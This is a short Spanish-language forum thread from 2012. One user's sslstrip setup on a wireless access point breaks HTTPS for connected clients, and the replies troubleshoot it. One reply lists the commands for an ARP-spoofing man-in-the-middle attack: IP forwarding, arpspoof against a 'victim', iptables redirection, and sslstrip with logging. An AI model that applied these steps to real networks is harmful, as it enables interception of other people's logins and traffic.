fallo con sslstrip

Iniciado por Socomate, 26 Febrero 2012, 05:32 AM

0 Miembros y 1 Visitante están viendo este tema.

Socomate

Hola pongo esto en este foro porque lo estoy haciendo para un softAP y todo funciona de manera normal para los clientes conectados al softAP salvo cuando un cliente está navegando con https: que la navegación web es imposible, la regla que controla el tráfico https es:

sudo iptables --table nat --append PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8181

y en otro terminal tengo:
sudo sslstrip -a -l 8181 -w dump_sslstrip -k -f

cuando el navegador del cliente se dirige a una página con https habilitado el navegador devuelve un mensaje tipo: "ha sido imposible realizar la conexión" y el fichero dump_sslstrip está vacío.



¿Alguien puede darme alguna pista?

P4nd3m0n1um

yo lo use una ves pero con ettercap.

En resumen, los pasos serian:

1. Configurar IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Realizando ataque ARP MITM entre las 2 maquinas:

arpspoof -i eth0 -t VICTIMA HOST

3. Redireccionar trafico con iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4. Iniciar SSLStrip en el puerto utilizado

python sslstrip.py -w archivo

según tengo en un manual.

después puedes guiarte también de aquí.

adastra

Por un lado, en la regla de IPTABLES que estas definiendo necesitas especificar la interfaz de red que estas usando (wlan0, quizas?) debes indicarla sea cual sea la etiqueta que tenga.
Por otro lado intenta especificar las opciones "-s" (para tracear todas las peticiones usando SSL  para y desde el servidor web) y si sigues sin tener logs, intenta la opción "-a" (para tracear todas las peticiones usando SSL o HTTP para y desde el servidor web)